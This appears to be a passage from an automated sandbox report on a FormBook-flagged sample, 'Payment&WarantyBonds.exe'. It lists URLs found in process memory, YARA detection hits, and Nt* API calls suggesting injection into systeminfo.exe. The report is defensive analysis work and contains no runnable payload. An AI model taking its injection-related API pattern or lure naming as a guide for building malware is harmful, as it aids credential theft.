                Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Exo
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72
                Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033)
                Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: systeminfo.exe, 00000007.00000003.2250291188.000000000789E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/css/parking2.css
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-desplegar.jpg
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-facebook-small.png
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-hosting.png
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-parking.png
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-ssl-parking.png
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-twitter-small.png
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web-sencilla.png
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web.png
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://plus.google.com/u/0/102310483732773374239
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_camp
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/piensasolutions
                Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.0000000005F66000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000003846000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campa
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=we
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dom
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=host
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaign
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensa
                Source: oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002D48000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/cloudhost/
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/jiaoyi/
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/domain/
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/mail/
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/webhosting/
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/ykj/view.asp?domain=cotti.club

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4148413603.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2063986251.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4148359872.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4150364860.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4148377228.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2064136057.00000000021E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Payment&WarantyBonds.exe
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_07302294 NtQueryInformationProcess,0_2_07302294
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_07306308 NtQueryInformationProcess,0_2_07306308
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0042C483 NtClose,2_2_0042C483
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014635C0 NtCreateMutant,LdrInitializeThunk,2_2_014635C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462B60 NtClose,LdrInitializeThunk,2_2_01462B60
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01462DF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01462C70
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01463010 NtOpenDirectoryObject,2_2_01463010
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01463090 NtSetValueKey,2_2_01463090
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01464340 NtSetContextThread,2_2_01464340
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01464650 NtSuspendThread,2_2_01464650
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014639B0 NtGetContextThread,2_2_014639B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462BE0 NtQueryValueKey,2_2_01462BE0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462BF0 NtAllocateVirtualMemory,2_2_01462BF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462B80 NtQueryInformationFile,2_2_01462B80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462BA0 NtEnumerateValueKey,2_2_01462BA0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462AD0 NtReadFile,2_2_01462AD0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462AF0 NtWriteFile,2_2_01462AF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462AB0 NtWaitForSingleObject,2_2_01462AB0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01463D70 NtOpenThread,2_2_01463D70
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462D00 NtSetInformationFile,2_2_01462D00
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462D10 NtMapViewOfSection,2_2_01462D10
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01463D10 NtOpenProcessToken,2_2_01463D10
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462D30 NtUnmapViewOfSection,2_2_01462D30
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462DD0 NtDelayExecution,2_2_01462DD0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462DB0 NtEnumerateKey,2_2_01462DB0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462C60 NtCreateKey,2_2_01462C60
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462C00 NtQueryInformationProcess,2_2_01462C00
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462CC0 NtQueryVirtualMemory,2_2_01462CC0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462CF0 NtOpenProcess,2_2_01462CF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462CA0 NtQueryInformationToken,2_2_01462CA0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462F60 NtCreateProcessEx,2_2_01462F60
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462F30 NtCreateSection,2_2_01462F30
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462FE0 NtCreateFile,2_2_01462FE0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462F90 NtProtectVirtualMemory,2_2_01462F90
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462FA0 NtQuerySection,2_2_01462FA0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462FB0 NtResumeThread,2_2_01462FB0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462E30 NtWriteVirtualMemory,2_2_01462E30
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462EE0 NtQueueApcThread,2_2_01462EE0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462E80 NtReadVirtualMemory,2_2_01462E80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01462EA0 NtAdjustPrivilegesToken,2_2_01462EA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A4650 NtSuspendThread,LdrInitializeThunk,7_2_047A4650
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A4340 NtSetContextThread,LdrInitializeThunk,7_2_047A4340
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_047A2C70
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2C60 NtCreateKey,LdrInitializeThunk,7_2_047A2C60
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_047A2CA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_047A2D30
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_047A2D10
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_047A2DF0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2DD0 NtDelayExecution,LdrInitializeThunk,7_2_047A2DD0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_047A2EE0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_047A2E80
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2F30 NtCreateSection,LdrInitializeThunk,7_2_047A2F30
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2FE0 NtCreateFile,LdrInitializeThunk,7_2_047A2FE0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2FB0 NtResumeThread,LdrInitializeThunk,7_2_047A2FB0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2AF0 NtWriteFile,LdrInitializeThunk,7_2_047A2AF0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2AD0 NtReadFile,LdrInitializeThunk,7_2_047A2AD0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2B60 NtClose,LdrInitializeThunk,7_2_047A2B60
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_047A2BF0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_047A2BE0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_047A2BA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A35C0 NtCreateMutant,LdrInitializeThunk,7_2_047A35C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A39B0 NtGetContextThread,LdrInitializeThunk,7_2_047A39B0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2C00 NtQueryInformationProcess,7_2_047A2C00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2CF0 NtOpenProcess,7_2_047A2CF0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2CC0 NtQueryVirtualMemory,7_2_047A2CC0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2D00 NtSetInformationFile,7_2_047A2D00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2DB0 NtEnumerateKey,7_2_047A2DB0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2E30 NtWriteVirtualMemory,7_2_047A2E30
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2EA0 NtAdjustPrivilegesToken,7_2_047A2EA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2F60 NtCreateProcessEx,7_2_047A2F60
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2FA0 NtQuerySection,7_2_047A2FA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2F90 NtProtectVirtualMemory,7_2_047A2F90
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2AB0 NtWaitForSingleObject,7_2_047A2AB0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A2B80 NtQueryInformationFile,7_2_047A2B80
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A3010 NtOpenDirectoryObject,7_2_047A3010
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A3090 NtSetValueKey,7_2_047A3090
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A3D70 NtOpenThread,7_2_047A3D70
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A3D10 NtOpenProcessToken,7_2_047A3D10
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_00578FE0 NtCreateFile,7_2_00578FE0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_00579140 NtReadFile,7_2_00579140
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_00579230 NtDeleteFile,7_2_00579230
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005792D0 NtClose,7_2_005792D0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_00579440 NtAllocateVirtualMemory,7_2_00579440
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_0284EF040_2_0284EF04
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_073036580_2_07303658
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_073023880_2_07302388
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_07309D600_2_07309D60
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_073057200_2_07305720
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_073036490_2_07303649
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_073064900_2_07306490
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_073023780_2_07302378
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_073052E80_2_073052E8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_07309FF00_2_07309FF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_07309FE20_2_07309FE2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_07308E390_2_07308E39
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_07308E480_2_07308E48
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_07309D500_2_07309D50
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_07305BE00_2_07305BE0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_0B156BB00_2_0B156BB0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_0B152BE80_2_0B152BE8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_0B1508380_2_0B150838
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_0B1510A80_2_0B1510A8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_0B1527B00_2_0B1527B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_0B1527A20_2_0B1527A2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_0B150C700_2_0B150C70
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004184B32_2_004184B3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0040E0532_2_0040E053
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004021962_2_00402196
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004012202_2_00401220
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0042EA832_2_0042EA83
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004023722_2_00402372
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004023802_2_00402380
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0040FDAA2_2_0040FDAA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0040FDB32_2_0040FDB3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004026D22_2_004026D2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004026E02_2_004026E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004166EE2_2_004166EE
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004166F32_2_004166F3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004166AC2_2_004166AC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00402F102_2_00402F10
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0040FFD32_2_0040FFD3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B81582_2_014B8158
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014FB16B2_2_014FB16B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0146516C2_2_0146516C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F1722_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014201002_2_01420100
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CA1182_2_014CA118
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E81CC2_2_014E81CC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F01AA2_2_014F01AA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143B1B02_2_0143B1B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DF0CC2_2_014DF0CC
